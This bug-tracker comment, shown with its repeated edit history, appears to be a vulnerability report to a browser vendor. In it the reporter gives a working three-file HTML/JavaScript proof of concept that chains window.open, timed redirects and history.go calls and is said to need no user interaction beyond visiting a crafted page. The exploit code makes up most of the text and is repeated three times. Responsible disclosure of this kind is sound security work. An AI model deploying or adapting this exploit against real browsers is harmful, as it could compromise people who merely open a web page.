Hi Team,
I have developed slightly modified version of my exploit. It turned out there is no user interaction needed at all. This Attack could have been used for a mass pwnage. It is only required victim visits specially crafted website. Please take it into account. I have attached another video with the proof. Following is the code I am using now. The timings is here adjusted to high values just in order to show you each steps. I am using three html files: test.html, test2.html and test3.html
Victim is only required to open test2.html file.
test2.html:
<html>
</body>
</script>
win = window.open("https://google.com:1");
setTimeout('win.location = "http://localhost/"', 2000);
setTimeout('win.location = "http://testtest.com:1"', 4000);
setTimeout('win.location = "http://localhost/exploring/test.html"', 6000);
setTimeout('win.location.replace("http://localhost/exploring/test3.html");', 8000)
</script>
</body>
</html>
test.html
<html>
<body>
<script>
setTimeout('window.history.go(-3); window.history.go(-1);', 250);
</script>
</body>
</html>
test3.html:
<html>
<p>THIS IS PARAGRAPH</p>
<a href="http://abcd.abcde" id=mylink>link</a>
<script>
window.history.go(-2);
</script>
</html>
Bug 1528587 Comment 16 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Hi Team,
I have developed slightly modified version of my exploit. It turned out there is no user interaction needed at all. This Attack could have been used for a mass pwnage. It is only required victim visits specially crafted website. Please take it into account. I have attached another video with the proof. Following is the code I am using now. The timings is here adjusted to high values just in order to show you each steps. I am using three html files: test.html, test2.html and test3.html
Victim is only required to open test2.html file.
test2.html:
```
<html>
</body>
<script>
win = window.open("https://google.com:1");
setTimeout('win.location = "http://localhost/"', 2000);
setTimeout('win.location = "http://testtest.com:1"', 4000);
setTimeout('win.location = "http://localhost/exploring/test.html"', 6000);
setTimeout('win.location.replace("http://localhost/exploring/test3.html");', 8000)
</script>
</body>
</html>
test.html
```
<html>
<body>
<script>
setTimeout('window.history.go(-3); window.history.go(-1);', 250);
</script>
</body>
</html>
```
test3.html:
```
<html>
<p>THIS IS PARAGRAPH</p>
<a href="http://abcd.abcde" id=mylink>link</a>
<script>
window.history.go(-2);
</script>
</html>
```
Hi Team,
I have developed slightly modified version of my exploit. It turned out there is no user interaction needed at all. This Attack could have been used for a mass pwnage. It is only required victim visits specially crafted website. Please take it into account. I have attached another video with the proof. Following is the code I am using now. The timings is here adjusted to high values just in order to show you each steps. I am using three html files: test.html, test2.html and test3.html
Victim is only required to open test2.html file.
test2.html:
```
<html>
</body>
<script>
win = window.open("https://google.com:1");
setTimeout('win.location = "http://localhost/"', 2000);
setTimeout('win.location = "http://testtest.com:1"', 4000);
setTimeout('win.location = "http://localhost/exploring/test.html"', 6000);
setTimeout('win.location.replace("http://localhost/exploring/test3.html");', 8000)
</script>
</body>
</html>
```
test.html
```
<html>
<body>
<script>
setTimeout('window.history.go(-3); window.history.go(-1);', 250);
</script>
</body>
</html>
```
test3.html:
```
<html>
<p>THIS IS PARAGRAPH</p>
<a href="http://abcd.abcde" id=mylink>link</a>
<script>
window.history.go(-2);
</script>
</html>
```